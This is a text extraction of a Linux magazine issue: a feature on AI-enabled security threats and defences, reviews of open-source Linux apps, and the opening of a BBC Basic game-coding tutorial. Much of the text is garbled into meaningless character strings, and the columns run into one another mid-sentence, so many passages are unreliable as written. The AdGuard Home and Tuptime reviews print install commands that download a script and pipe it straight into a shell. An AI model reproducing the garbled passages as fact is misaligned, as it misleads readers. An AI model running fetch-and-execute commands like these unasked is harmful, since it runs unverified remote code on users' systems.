"!!"!1,"5&01&+$-%&0%&+$v0vv0"/3& ",##"/&+$0n 01$"11 (o04"}3")/"!6+,1"!n$"11&+$&+1,
12/+&+$1%"*&+1,*,/" ,*-/"%"+0&3"0, &)v sensitive systems and gaining access to valuable data
"+$&+""/&+$v0vv0"/3& "1,,)(&10€o /",1%/"04%"/"  +"*-,4"/1%"!$260o
Etay Maor, chief security strategist and founding
Automated exploits *"*"/,#1,11,"14,/(0n4/+0p 
%"/&0(0,# $,#/"6,+!0, &) increases the threat of ransomware by helping
"+$&+""/&+$o0 *&"" ()+!n *)& &,20 1,/01, //6,2111 (0,+"+1"/-/&0"0o€
1 ,+1"51n1,)!20n  Phishing is most often involved at the early stage in
analysis can now be used to order to gain initial access, as is vulnerability hunting,
discover and exploit software and +!4"}3"0""+%,41%"0"/""&+$,,01"!6 o
 32)+"/&)&1&"0#/#01"/1%+ +&1&)v "00/,("/0n4%,0")) ,*-/,*&0"! "00
human hackers have historically 1,+"14,/(01,/+0,*4/"##&)&1"0/" "/1&+)6
*+$"!o%&0&+ /"0"01%" &*-)"*"+1&+$1,,)01,*("1%"&/',*,/""##& &"+1o
likelihood of breaches occurring Then there are other steps, such as “establishing
before patches can be applied,” #,,1%,)!&+1%"+"14,/(n002/&+$-"/0&01"+ 6n
060" ()+!o performing discovery, stealing passwords, escalating
The danger isn’t limited to -/&3&)"$"0n+!0"11&+$2-01$&+$-)1#,/*€o%"1%"/
,!"32)+"/&)&1&"0&+,-"/1&+$ as part of the actual attack itself, or during the
0601"*0+!--0o%"0*"16-" reconnaissance process, “threat actors are continuing
CREDIT:%")Ƈ20"2*š,22"o š-2)& !,*&+

of automated process can be 1,!&0 ,3"/%,4  +00&011%"*&+1%"&/ /&*"0€o

directed towards any publicly The ransomware itself may soon be enhanced with
3&))"/"0,2/ "x02 %0 ),2!  n1,,o2//"+1)6n*,01-"/-"1/1,/0,#/+0,*4/"
0"/3"/0+!01,/$"0"/3& "0o 1}0 attacks don’t create the malware themselves, but lease
"061,-& 12/" v!/&3"+"5-),&1v malicious encryption tools from a small number of
Scams use a discovery toolkits being turned loose on poorly |*01"/*&+!}!"3"),-"/0o%&0*"+01%14%&)"
sense of urgency configured or insecure setups, or being deployed to ransomware attacks may appear widespread and
to try to force
victims into
*("1%"*,01,# /"!"+1&))"(0o diverse, there are sometimes similarities in the way
having no time %" (,&+1,#14/"}01")$/""0o11 ("/0 + they spread and operate, which can help combat them
to sense-check gather and correlate this information quickly, spotting x+!1%",3"/%"!0,#)"0&+$)&*&11%"*/("1,#
­ǏĬìijķ­ijìČĆƧ breaches, leaked email addresses or passwords used -,1"+1&)11 ("/0o21  ,2)!0,,+"20"!1,
in past attacks and then use that data to craft more create completely new types of malware that are
-/" &0"11 (0$&+016,2/,/$+&01&,+o€ harder to defeat, and are available to anyone with
/")1"!-/,)"*&0 20"n4%"/"*)& &,20  "001,$"+"/1&3" 0601"*o&$%1+,4n
 1,/020" 1,+)60" "00&)" 0+!"5-),&1  v$"+"/1"!*)4/"&0-/"116 /2!"+! )2+(6x21n
1%"*4%"/"32)+"/)"x4%& % +)"!1,!1 0 33!)&(n)"!0" 2/&164/"+"00!3, 1"1

80 LXF326 April 2025 www.linuxformat.com

 AI security threats IN DEPTH

IN-HOUSE AI DANGERS
%&)"*+620&+"00"0/"/&$%1)6 ,+ "/+"!
,2111 ("/020&+$ #,/+"#/&,20-2/-,0"0n
*+$"/0)0,+""!1,"4/",#1%"
-,1"+1&)/&0(0,#20&+$0""*&+$)6&++, "+1 
1,,)01%"*0")3"0o
,/01/1n&1}04"))(+,4+1%1  +
‘hallucinate’ facts and figures, and even if you’re
,+)6/")6&+$,++ 1,02**/&0",/+)60"
supplied information, there’s always a risk that it
4&))*&00,/*&0011"&*-,/1+1-,&+10o #6,2/")6
,+1%",21-21,#+ n6,2 ,2)!"+!2-*(&+$
1%"4/,+$!" &0&,+0n4&1%!&001/,20/"02)10o
 1,,)0/")0,32)+"/)"1,-/,*-1
&+'" 1&,+11 (0n4%"/"*)& &,20 1,/$&3"0
&+01/2 1&,+01,1%" 1,*("&1!,0,*"1%&+$&1}0
+,102--,0"!1,x02 %0/"3")&+$ ,+#&!"+1&)
data that it’s previously processed, or giving bad
&+#,/*1&,+4%"+.2&77"!o%"$,3"/+*"+1}0
1&,+)6"/" 2/&16"+1/",##"/00,*"
,+)&+"!3& "#,/4,/(&+$0#")64&1% ƒ0""
http://tinyurl.com/363ncsc), and an extensive %"0*"--)&"0&+/"0)&(" 20"o0 Cybersecurity
$,3"/+*"+1v ,**&00&,+"!012!640-2)&0%"! " ()+!!3&0"0n6,20%,2)!+,1&$+,/"1%" training has
become absolutely
&+6:8:<"5-),/&+$32)+"/&)&1&"0&+  &*-,/1+ ",# ,+1&+2,20 *,+&1,/&+$+! essential in the
systems (http://tinyurl.com/363study„o automated vulnerability scanning, to minimise the modern world,
"01/,+$)6/" ,**"+!1%1 *+$"/0 4&+!,4,#,--,/12+&16#,/*)& &,20"5-),&11&,+€o even before
read the entire report, but if you need to To be clear, though, that doesn’t mean looking for a
?ǏijéĨЭijĬƧ
(+,4'201,+"1%&+$n%""!1%"}0!3& " 0&)3"/v2))"1 v0"!0" 2/&160,)21&,+o&)3"/2))"10
1%1(""-&+$ 0601"*00" 2/"&00*2 % !,+}1"5&014%"+&1 ,*"01, 1%/"10n+6*,/"1%+
about organisational culture, process and 1%"6!,#,/+61%&+$")0"o)!v0 %,,)*"02/"002 %
communication as it is about technical 0: n ,2+10"-/1&,+n-1 %*+$"*"+1+!
*"02/"0€o +,1%"/4,/!0n002*"1%"4,/01 +"14,/(0"$*"+11&,+/"01&)),#21*,01&*-,/1+ "o
,#+6 0601"*n+!1("01"-01,"+02/"1%1 “Organisations considering the deployment
your workflows aren’t leaving you vulnerable to ,# v0"!0,)21&,+00%,2)!3,&!/20%&+$&+'201
2+&+1"+!"!*&01("0,/&+1"+1&,+)"5-),&10o " 20"&1}01%")1"011/"+!n€16,/060o,2+""!
to thoroughly appraise and trial systems before rolling
1%"*,21o ,/12+1")6n1%"/"/"0"3"/)#/*"4,/(0
+,4"<n-,&+10,21n !,"0),4"/1%"//&"/1, 3&))"1,00&014&1%1%&0n02 %0 ,,$)" n 
"+1/60&$+&#& +1)6n+!4&)),+)6$"1"11"/o€   n1%",-98#,/0n+! 
o%"0"#/*"4,/(0%")-,/$+&01&,+0
AI protection understand the risks, attack surfaces and potential
)"/)6n &0+}10&+$)"1%/"1n21-,4"/#2)n3"/01&)" 1%/"101, v0"!0601"*0n€!!0,/o
set of technologies with implications for almost every +!1%""01!"#"+ "$&+011%"*)& &,2020",#
0-" 1,# 6"/0" 2/&16o,n/1%"/1%+),,(&+$#,/ +"41" %+,),$6n&+1%",-&+&,+,#!*&)1,+n&0+}1
single solution, we must think broadly about defensive technical at all, but rather takes the form of employee
*"02/"0o%"+!")&+$4&1%!""-#("0n#,/"5*-)"n 1/&+&+$+!4/"+"00o 1}0&*-"/1&3"1%14"
*&"" ()+!/" ,**"+!01%120&+"00"0 ,+0&!"/ /"$2)/)6"!2 1""*-),6""0,21 v!/&3"+1%/"10n€
/,201*2)1&v# 1,/21%"+1& 1&,+0601"*01%13"/&#6 &)1,+060o"*201*("&1 )"/1%1"*-),6""0
not only user credentials but behavioural biometrics, should be cautious about the information they share
1,,o!3+ "!*,+&1,/&+$1,,)0!"1" 1+,*)&"0&+ ,+-2)& -)1#,/*0n0  +"0&)60 /-"0, &)
communication patterns and transactional behaviours *"!&1, /#11/$"1"!0, &)"+$&+""/&+$11 (0o€
that can help identify and prevent unauthorised -,4"/#2)461, %&"3"1%&0&01,*("&1/")o
 1&3&1&"0"#,/"1%"6"0 )1"n€%"060o 6 ,+!2 1&+$-"/&,!& 1)"1,-"5"/ &0"0+!
+!)"1}0+,1#,/$"11%11%"3"/61" %+,),$61%1}0 11 (0&*2)1&,+0n€&)1,+ ,+ )2!"0n4"1"011%"
being deployed against us can also be used to our effectiveness of our incident response plans, crucially
!3+1$"q &0+}1,+"v4601/""14%"+&1 ,*"0 &+ )2!&+$,2//"0-,+0"1, v/")1"!11 (0)&("
1, 6"/0" 2/&16o%&0%&+$11 (0n&*-"/0,+1&,+ !""-#("0,/21,*1"!"5-),&10o€
+!0, &)"+$&+""/&+$/"))/"04%"/"  +" //1&+ /"*"/$/""01%14/"+"001/&+&+$
deployed to exploit vulnerabilities, but, as Muhammad has to go beyond the written word, or periodic chats
%61")060n1%"21,*1&,+"+)"!6  + about threats; it needs to include exposure to the
also help in vulnerability management, continuously 1%/"1&10")#o" ,/!!""-#("3&!",,#1%"n€
scanning for weaknesses within an organisation’s %"/" ,**"+!0n+!20"1%104/"+"00*1"/&)
02--)6 %&+,/ ),2!"+3&/,+*"+1€o 1,!"*,+01/1"1%"1%/"101,"3"/6,+"o€

www.techradar.com/pro/linux April 2025 LXF326 81

GET ALL THE ESSENTIAL BREAKING
NEWS FOR THE TECH ENTHUSIAST!
No matter if you're building a PC,
buying a laptop or learning about
robots, Tom's Hardware has all the
comprehensive knowledge you need.

Scan & Subscribe

for free!

Make Python work for you with

tutorials on coding with Django,
Flask, Pygame and even more useful
third-party frameworks.
THE BEST NEW OPEN SOURCE SOFTWARE ON THE PLANET

Mayank Sharma
is thinking of reigniting the
SysD Manager AdGuard Home ExifTool Vim versus Emacs debate
in the hope of generating
Tuptime Xournal++ Hidamari PeaZip heat to warm him enough
to discover new apps.
HeXon FeudalTactics Lock Double Commander

SYSTEMD MANAGER

SysD
Manager
Version: 1.6 Web: https://github.
com/plrigaux/sysd-manager
SysD Manager is intuitive to use and also has a comprehensive search function to
ystemd is the de facto startup and service help you narrow down the list of services.

S management system for Linux distributions.

You use it to start, monitor and terminate enable or disable the service, and to start, stop, restart
services or daemons on Linux. Although these days and kill it.
you don’t really need to manually manage system Although the main purpose of the app (and Systemd
services very often, when you do, you have to drop itself) is to help you control services, you can also use
down to the command-line interface. If that isn’t your it to manage several other aspects of the distro, such
thing, you can get help from the SysD Manager utility, as logins, mount points and more.
which enables you to manipulate Systemd services
from a graphical interface. LET’S EXPLORE SYSD MANAGER...
On Fedora-based distributions, you can install
60+$"/ through its COPR repository. First,
make sure you have the core DNF plugins with sudo 2 3
dnf install dnf-plugins-core . Then enable the
--)& 1&,+}0/"-,4&1% sudo dnf copr enable
plrigaux/sysd-manager , before installing it with 1
sudo dnf install sysd-manager .
If you use another distro, you can install SysD 4
Manager as a distro-agnostic Flatpak with flatpak
install flathub io.github.plrigaux.sysd-manager .
When you launch SysD Manager for the first time,
&1-,-0,-"+1%"/"#"/"+ "0!&),$o6!"#2)1n1%"
app enables you to manage the services specific to a
user’s session, but if you want to use the application
1,*+$"))0"/3& "0/2++&+$&+6,2/!&01/,n20"1%"
pull-down menu in the Preferences dialog box to set
Services list Control services
the Dbus level to System. 1 This pane displays an alphabetical list 3 Use the toggle and buttons here to
The app has a two-pane interface. On the left of all Systemd units available in the distro, ÐĆ­ÅÿÐǏČĨǎÌìĬ­ÅÿÐǎ­ǎĬÐĨŊìÆÐƨǎ­ĆÌǎĬij­ĨijƨǎĬijČĥƨǎ
6,2%3"/1%"/),+$)&01,#))1%"0"/3& "0&+6,2/ irrespective of their type. You can also tell restart or kill it.
distro. The app lists the name of the service or unit, whether they are active or not.
Service details
&1016-"n+!4%"1%"/&1}0"+)"!,/+,1n),+$4&1%&10
Search services 4 Here you get all the important details
running status. There’s also a brief description to help 2 You can use the search box to find about the selected service, including its
beginners identify the service. services by their name, and also filter them memory and CPU usage. Use the Show All
On the right you get details about the currently by their type, enablement status, and active/ Information button to get dozens of other
selected service, along with toggles and buttons to inactive status. ijőĥÐĬǏČãǎÌÐij­ìÿĬƧ

www.techradar.com/pro/linux April 2025 LXF326 83

HOTPICKS

Unlike ad-blocking
AD BLOCKER plugins that
protect individual

AdGuard
devices, AdGuard
Home can be
easily rolled out to
protect all devices

Home
in your network.

Version: 0.107.55
Web: https://adguard.com/en/
adguard-home/overview.html
dGuard Home is a network-wide ad-and- AdGuard Home a static IP, if you haven’t already. You’re

A tracker-blocking DNS server that can be rolled

out with little effort. The app is easy to deploy
also asked to set up authentication details for AdGuard
Home’s admin interface in order to restrict access.
and can be customised via its browser-based interface. On the server’s dashboard, you get statistics about
Surprisingly, for a server, AdGuard Home is pretty the DNS traffic flowing through it, and the protection
straightforward to deploy. Fire up a terminal and pull level, such as the number of DNS queries processed,
&10&+01))1&,+0 /&-14&1% wget --no-verbose -O - and the number that were blocked. It also shows how
https://raw.githubusercontent.com/AdguardTeam/ many of them were blocked for security reasons, the
AdGuardHome/master/scripts/install.sh | sh -s -- -v . top blocked domains, and more.
Once it’s installed, you can control the app from its 6!"#2)1n1%"0"/3"/), (0,3"/=8n888!,*&+0n
intuitive browser-based interface that’s up and running which means you can use the server as is without any
at http://127.0.0.1:3000. On first launch, the app takes *,!&#& 1&,+0o21&#6,24+1n6,2 +)0, /"1"
you through a brief configuration wizard. 6,2/,4+ 201,*), ()&016%"!&+$1, &)1"/0–
This wizard lists the address of the DNS server that ), ()&010o,2 +)0,.2& ()6), (&+#*,200&1"0
you need to add to individual devices in your network +!0"/3& "06%"!&+$1, &)1"/0–), ("!"/3& "0o
or your router, along with instructions on how to go You can block all of the ones listed on the page with a
about it. It also reminds you to give the device running click, or block them selectively as per your needs.

IMAGE METADATA MODIFIER

ExifTool
Version: 13.11
Web: https://exiftool.org

f you are a shutterbug, ExifTool is a handy

I utility to have in your image-editing portfolio.

This CLI tool comes in handy when you need
to modify the metadata associated with an image.
While you can do this with several graphical photo-
editing apps as well, ExifTool makes it fairly simple to
do this for multiple images in a fraction of the time.
ExifTool doesn’t need to be installed. You can simply This command displays all of the tags with the You can easily use
download and extract the tool’s tarball and run it phrase GPS in their name, such as GPSLatitude, ExifTool to strip all
location-specific
directly with the following: GPSLongitude, GPSPosition and others.
metadata from
$ wget https://exiftool.org/Image-ExifTool-13.11.tar. Also, in addition to acting on individual files, you your holiday snaps
gz +20"1%"1,,)1,4,/(,+*2)1&-)"&*$"011%" before you share
$ gzip -dc Image-ExifTool-13.11.tar.gz | tar -xf - same time. For this, all you need to do is substitute the them online.
$ cd Image-ExifTool-13.11 name of an individual file with that of a folder. This tells
$ ./exiftool <imagefilename> ExifTool to recursively scan all the images and even
When you point the tool to an image file, it prints subfolders inside the specified folder.
)),#&10*"1!1o02))6n%,4"3"/n6,2/",+)6 As well as reading metadata, ExifTool can also
interested in a few particular tags. For instance, if you perform other useful actions. You can, for instance, use
wish to view the location-specific metadata for an it to write metadata, copy tag values between files, and
image, you can pull up just its GPS data with exiftool even use the data in specific tags to rename files, such
-*GPS* holiday-pic.jpg . as adding the date and time to the filename.

84 LXF326 April 2025 www.linuxformat.com

 HOTPICKS

The Tuptime
SYSTEM AVAILABILITY utility houses the
system availability

Tuptime
details in a SQLite
database, and can
also output these
in CSV format.

Version: 5.2.4 Web: https://github.

com/rfmoz/tuptime

he uptime utility is a simple tool that gives you

T information about how long the system’s been

/2++&+$n),+$4&1%0,*",1%"/!"1&)0o21
this information is only available about the current
session. The Tuptime tool, though, tracks these details
across reboots, and presents them in a much nicer way.
You can grab precompiled binaries of the utility for In addition to the system startup date and time,
your distro from its website or, better still, just use its 6,2/")0,-/,3&!"!4&1%1%"!1"+!1&*"4%"+1%"
installation script with bash < <(curl -Ls https://git.io/ system was shut down. The utility also tells you how
tuptime-install.sh) . long the system was down for before it was brought
The utility starts tracking system availability details back to life again.
from the time it’s installed. When called, the Tuptime You can use the -A option to get details about
command doesn’t just display the current uptime, -/1& 2)/0"00&,+o ,/&+01+ "n tuptime -A 9
21)0,1%"+2*"/,#0601"*01/12-00&+ "&10 displays the uptime and downtime details about the
installation, along with other interesting details, such ninth session.
01%"),+$"01+!3"/$"2-1&*"+!!,4+1&*"o The utility uses the date/time format from the
0" tuptime -l or tuptime -t to get these details default system locale. You can, however, change it and
about individual sessions, in a list or a table format, specify your own date/time format with the -d option.
/"0-" 1&3")6o6!"#2)1n1%"!"1&)0/"-/"0"+1"!&+ For instance, tuptime -d ‘ %d-%B-%Y’ displays the
chronological order. Throw in the -r option, such as !1"0:?v" "*"/v:8:<o""1%"-/,'" 1}0
tuptime -t -r , to reverse the listing order. documentation for a list of all the format codes.

DIGITAL NOTES

Xournal++
Version: 1.2.5
Web: https://xournalpp.github.io

here’s no dearth of note-taking apps, but what

T makes Xournal++ special is its support for

digital pens. Thanks to this, besides scribbling
notes, you can also use the app to annotate PDFs.
Xournal++%0#,/2+1220"/0n21&1}0"01
just to use the official AppImage or Flatpak. You can
install the latter with flatpak install flathub com. can choose, such as a dashed pen or a dotted one. Xournal++ is fairly
github.xournalpp.xournalpp . ,2 + %+$"1%"01/,("11/&21"0n02 %0&10 ,),2/ straightforward
to get into, but
%"--02--,/10))(&+!0,#&+-21!"3& "0o"0&!"0 and thickness using the toggle buttons and drop-down
take a moment to
the mouse, keyboard, touchpad and touchscreens, it menus in the toolbar. skim through its
also supports a wide-variety of pressure-sensitive Then there’s the highlighter, as well as the option documentation to
styluses, and tablets, such as those from Wacom, 1,!/4 ,**,+0%-"0n02 %0/" 1+$)"0n"))&-0"0n make the most of
Huion, XP-Pen and more. arrows and more. You can also type text into the notes, the app.
After launching the app for the first time, head to as well as LaTeX formulas. The app also contains a
!&1–/"#"/"+ "0n+!04&1 %1,1%" +-21601"*1 couple of geometry tools that you can use to make
to ensure the app has detected all the input devices geometric constructions.
connected to your computer, and assigned them the ,++,11" #&)"%"!1,1%" &)"–++,11"
correct role. PDF option to select a PDF file. You can then use the
The app expects you to hand-write the notes using usual tools to scribble and write on top of the PDF
your preferred input device, which is why the Pen tool is pages. Once you’re done, you can export your creation
selected by default. There’s a handful of pen types you to a variety of formats including SVG, PNG and PDF.

www.techradar.com/pro/linux April 2025 LXF326 85

HOTPICKS

VIDEO WALLPAPER

Hidamari
Version: 3.6 Web: https://github.com/
jeffshee/hidamari

f you’re bored of having static wallpapers

I ,+6,2/!"0(1,-n6,2 +20"Hidamari to
/2+3&!",004))--"/0o/&11"+&+61%,+n
Hidamari can use local videos or stream them from
online services such as YouTube, directly on to the
!"0(1,-o+!1%+(01,&1002--,/1#,/ 3&!",
decoding, you wouldn’t really notice any performance
lag on modern-day hardware. click context menu on the desktop while the video Besides setting
videos as
Hidamari is available as a distro-agnostic Flatpak and &0/2++&+$o
wallpapers, you
can be installed with flatpak install flathub io.github. In addition to the ability to control playback, you also can also ask
jeffshee.Hidamari . get the option to mute and unmute the video here. The Hidamari to set a
The app has a simple tabbed interface. To play right-click menu also has the I’m Feeling Lucky option, video frame as a
any of your videos as wallpaper, drop them inside you can also reload the video from here, and bring up static wallpaper.
the ~/Videos/Hidamari folder. Any files in there show the Hidamari interface. The tool also automatically
up under the Local Video tab. Select the video you want pauses playback when a window is maximised or an
to use as the wallpaper and click the Apply button. app is running in full-screen mode.
If you have multiple videos, you can use the I’m To use a video from the internet as wallpaper, switch
Feeling Lucky button in the top-left corner of the app 1,1%"1/"*&+$1+!-01"1%",#1%"3&!",&+
to allow the app to pick one on its own. There’s also the the text box. Similarly, head to the Web Page tab to
Play/Pause button next to it that helps you to control point to a website or an HTML file on your computer to
the video playback. You also get this option in the right- use it as your wallpaper.

FILE ARCHIVER

PeaZip
Version: 10.2.0
Web: https://peazip.github.io

orking with compressed archives is one of

W those quintessential computing tasks. While

you can create and browse compressed
archives from the file manager in any modern-day
distro, advanced functions are usually only available
from the command line. PeaZip is a graphical utility
1%14,/(04&1%,3"/:8816-"0,#/ %&3"#,/*10n The app also supports a handful of compression Although
+!,##"/0"3"/6(&+!,# ,*-/"00&,+#2+ 1&,+6,2 + levels, depending on whether you want to just roll designed to work
with compressed
imagine, and then some. multiple files into an archive in a jiffy, or squeeze them
archives, you can
PeaZip is available as a Flatpak and can be installed as much as possible. You can also protect your new also use PeaZip
with flatpak install flathub io.github.peazip.PeaZip . archive with a password and/or a keyfile. You get to securely
The application has a tabbed, two-pane interface options to delete the original files after they’ve been delete, split and
1%1),,(00&*&)/1,#&)"*+$"/o+1%"1,-&1%0 compressed, too, and also to add them to a tarball join any file.
buttons for its major functions to create, extract and before compressing them.
convert archives. 6!"#2)1n1%"-- /"1"0+"4/ %&3"n216,2
The Add button brings up the Create Archive can also use PeaZip to add files to an existing archive.
interface. Drag and drop any files you want to You can double-click a compressed file to browse its
compress or click the + button to browse the contents, or use the Extract button to inflate it.
#&)"0601"*1,-,&+1&11,+6#&)"0+!#,)!"/0o0" Note that while using PeaZip is simple, it is not a
1%"6-"!/,-v!,4+*"+21,0")" 1#/,*,+",#1%" simple app. Virtually all of its functions offer tons of
dozen or so compression formats. options that will be of use to advanced users.

86 LXF326 April 2025 www.linuxformat.com

 Games HOTPICKS

ARCADE ACTION

HeXon
Version: 20241021
Web: https://luckey.games

eXon is a straightforward space shooter

H 4&1%&+1"/"01&+$-%60& 01%1*("0#,/
challenging gameplay.
To play, download the ZIP archive from the project’s
website, and extract it with unzip hexon.zip -d hexon .
Then switch to the extracted hexon directory and
launch the game with ./hexon . irrespective of the orientation of your ship. For HeXon is a simple
The premise is simple: take charge of your instance, the 9 key fires in the top-right direction, arcade shooter
spaceship and zoom through the screen destroying while the 1 key fires lasers towards the bottom-left. that’ll suck up
hours thanks to
enemy vessels while you collect upgrades. Enemies come in the form of razors, spires and its portal-like
However, mastering flight takes some doing. That’s masons, each of which has its own characteristics space arena
because all edges of the space arena are connected and rewards. When you destroy razors, you get five and its steadily
1,1%"&/,--,0&1"0&!"0)&("-,/1)0o%&0*"+01%1 -,&+10n4%&)"0%,,1&+$0-&/"0$"106,298o0,+0 increasing pace.
&+01"!,#,2+ &+$,##1%""!$"n6,2'201"5&11%" /"!&##& 2)11,!"01/,621/"4,/1%<:-,&+10o,2
arena and reappear on the opposite side. Easy to wrap also get points collecting pickups, which come in the
your head around, but way more difficult to master. form of apples, hearts and chaoballs.
The multiplayer game supports up to four players. Each apple is worth 23 points, and you can
11%"01/16,24)(&+1,1%"%+$/1,0")" 16,2/ upgrade your weapons by collecting five of them
0- "0%&-o0"1%"("601,01""/6,2/ /#1 &+/,4o "/10/"-&/!*$"1,6,2/ /#1n+!
&+0&!"1%"%"5$,+)0- "/"+o0"1%"+2*"/-! collecting five of them one after the other restores
to fire the lasers that shoot in the direction of the keys full health and also charges your shields.

STRATEGY

FeudalTactics
Version: 1.3.1 Web: https://github.
com/Sesu8642/FeudalTactics

f you’re a fan of strategy games, you should

I love this one, which is set in medieval times.

The gameplay involves taking over a randomly
generated island made of hexagons. You achieve this
by judiciously using the resources at your disposal to
both attack your enemy and defend your own kingdom. Feudal Tactics gives you the option to alter the difficulty of your opponent and
The game is written in Java, and you can grab its define the size of the map and its density before starting a game.
#&)"#/,*&10 &1 2/")"0"0-$"o%"+'201
#&/"2-1"/*&+)+!/2+1%"$*"4&1% java -jar soldiers (units in the game’s parlance) on an enemy
FeudalTactics-desktop.jar . If you don’t have Java set tile. The game has four types of units, with the
up on your distro, you can also install the game as a simplest being a peasant.
Flatpak with flatpak install flathub de.sesu8642. Click on a unit to pick it up and place it on any of
feudaltactics . 1%"%&$%)&$%1"!1&)"0o+&10)0,-/,1" 11&)"01%"6
Inside the game, two or more tiles of the same stand on, along with the ones next to them. They
colour make up a kingdom, and you can have multiple ,0198 ,&+0n+!6,2 + ,*&+"*2)1&-)",+"01,
kingdoms spread throughout the island. conjure up a stronger unit. A stronger unit can take
Select a kingdom by clicking on any of its tiles. ,3"/1&)"-/,1" 1"!60&*-)"/2+&1o+&10*201
%&01%"+!&0-)60&10#&++ "0&+1%"1,-v)"#1 ,/+"/ also be paid salaries.
,#1%"0 /""+o,2$"1,+" ,&+-"/1&)"n-"/12/+n+! "0&!"01%"0"n1%"/"/" ,2-)",#,1%"/
))6,2/*,+"6&0%,20"!&+1%" -&1)1&)"o,1(" parameters at play as well. Run through the game’s
,3"/"+"*61&)"0n6,2+""!1,-& (2-+!-) "6,2/ tutorial to familiarise yourself with all of them.

www.techradar.com/pro/linux April 2025 LXF326 87

HOTPICKS

GPG FRONT-END

Lock
Version: 1.3.8 Web: https://
konstantintutsch.com/Lock/

PG is arguably the best tool for encrypting

G +!0&$+&+$1"51+!#&)"0o21"&+$
command-line interface tool, it isn’t really
accessible to everyone. Lock helps solve this problem
by exposing GPG’s functionalities through an appealing
graphical interface.
The application is distributed on Flathub and can 20"1%" *-,/1211,+1,-,&+11%"--1,1%" Lock makes it
fairly intuitive to
"&+01))"!4&1% flatpak install flathub com. person’s public key.
generate keys
konstantintutsch.Lock . You’re now all set to encrypt, sign, decrypt and and use them to
"#,/"6,2 +20"Lock to encrypt and sign text verify text and documents. encrypt, decrypt,
and files, you need to generate an encryption key. Click Head to the Text tab and enter the text you want sign and verify
on the hamburger menu and head to Manage Keys. 1,"+ /6-1o0"1%"-2))v!,4+*"+2&+1%"1,-v)"#1 ijÐŐijǏ­ĆÌǎãìÿÐĬƧ
Now click the + icon to generate a new key. Enter your corner and select the Encrypt option. Lock then
name and email address, and just go with the default 0(06,21,0")" 11%"("61,"+ /6-11%"1"51o0
options for the rest of the fields, unless you know what soon as you do, it replaces the plain text with the
you’re doing. encrypted text. You can now pass it along, and
You now need to export this key to the person with anyone with your public key can decrypt it.
whom you want to exchange encrypted documents, To decrypt an encrypted text, copy and paste it
+!&*-,/11%"&/("6o0"1%"5-,/1"6211,++"51 &+Lock. Then select the Decrypt option from the
1,1%"$"+"/1"!("61,"5-,/1&11,1"51#&)"n4%& % pull-down menu. Lock prompts you for the key’s
you can then forward to the other person. Similarly, password before it decrypts the text.

FILE MANAGER

Double
Commander
Version: 1.1.21 Web: https://
doublecmd.sourceforge.io

T
he default file manager in your distro is good
enough for most tasks, but third-party options
can do a lot more. The cross-platform Double houses some interesting ones. For instance, you can You can use
the Double
Commander is one such option that’s inspired by the change the attributes of a file, get a count of the files
Commander
popular Windows-only Total Commander file manager. and subfolders inside a folder, and their total size, file manager
Double Commander is available as a portable release split and combine files, calculate and verify file for regular file
for both GTK and Qt-based desktops. You can also checksums, and a lot more. management
grab it as an AppImage. Once downloaded, make the Double Commander also supports tabs, so you functions and
a lot more.
AppImage executable either with the chmod +x +,-"+#,)!"/0&++"410o211%&0&03&))"3&
command, or through your default file manager. the Ctrl+up keyboard shortcut only. You can also use
Double Commander is an orthodox file manager it to peek inside compressed archives, or even copy
with a dual-pane interface. You can operate it via the files from inside without extracting the archive.
mouse or keyboard. The default keybindings are the It also has an advanced search function that
same as in Total Commander, but can be remapped. +#&+!1"51&+0&!"#&)"0,/0"/ %4&1%&+/ %&3"0o
The app works just like any other file manager and There’s also a directory synchronisation tool that can
can perform all the usual tasks you expect from such a compare and mirror the contents of the directories
tool. Most of the common operations are rolled up in in its two-panes. Also handy is the multi-rename tool
the right-click context menu, while the Files menu that you can use to rename multiple files at once.

88 LXF326 April 2025 www.linuxformat.com

CODING ACADEMY
B2
Credit: https://github.com/tom-seddon/b2
Part Three!
Don’t miss
next issue,
subscribe on

Coding Cosmic
page 16!

Invaders in BBC Basic

Nate Drake invites you to stave off the alien menace by coding your
very own Space Invaders clone in Basic, because it’s 2025!

o far in this series, we have covered how instructions in the title screen, the game throws up a

S 1%" )00& -/,$/**&+$)+$2$"0& 

ƒ"$&++"/0}))v2/-,0"6*,)&  +01/2 1&,+
‘NO SUCH FN/PROC’ error.
In this tutorial, we’ll cover how the player fires
,!"„ +01&))"20"!1,!61, ,!"$*"0)&("/( weapons. We’ll also touch on the procedures for when
Buckwell’s Cosmic Invaders. the aliens are hit. If you haven’t read the preceding
OUR In the first instalment of the series, we created tutorials in this series, we recommend viewing the
EXPERT ,!"1,"01)&0%0& 1&1)"0 /""+o%"#,)),4&+$
month’s tutorial covered loading the basic game
sample scripts at https://github.com/azuregate/
lxfcosmicinvaders. This will give you a better idea of
Nate Drake elements, such as the player ship and bases, as well as how to put the game together in a methodical way.
first experienced the invaders themselves. If you followed the steps in As always, we have chosen the b2 BBC Micro
video games last month’s Managing Movements boxout, the player emulator to run Basic code, as it’s readily available
when he ship also now can be moved left and right using the Z &+1%"2+12+-01,/"o+ "1%&0&0&+01))"!n6,2
encountered the and X keys respectively. +/2++6,#1%"0*-)"0 /&-10&+1%&00"/&"0o 201
cocktail cabinet The aliens now also move from side to side and copy the text to the clipboard, then in b2 choose Edit >
version of Space downwards towards the player. As the current sample  01"ƒ"12/+„o+ "1%" ,!"&0 ,-&"!&+1,
Invaders in his script COSMIC8.bas stands, they will continue to do so b2, just enter RUN to execute it.
father’s local. until they reach the bottom row of the screen, erasing
the bases as they go, until the game crashes. If the Opening fire
-)6"/1/&"01,/"12/+#&/"6-/"00&+$%&#10-"/1%" As we’ve established, if you run the current sample
script COSMIC8.bas+!-/"00%&#1n&1/"02)10&+1%"
#,)),4&+$"//,/p|,02 % š1)&+"9;=8o}
If you review the sample script, you’ll see it makes a
reference to Proc_Fire. This isn’t defined in COSMIC8.
bas but you can see this in the original game script
ƒ3&))"#/,*http://bit.ly/cosmicinvaders„p
1530 DEF PROC_Fire
1540 SOUND &0012,2,0,10 : Missile%=TRUE :
MissileX%=B%+2 : MissileY%=22 : PROC_Move_
Missile(L%)
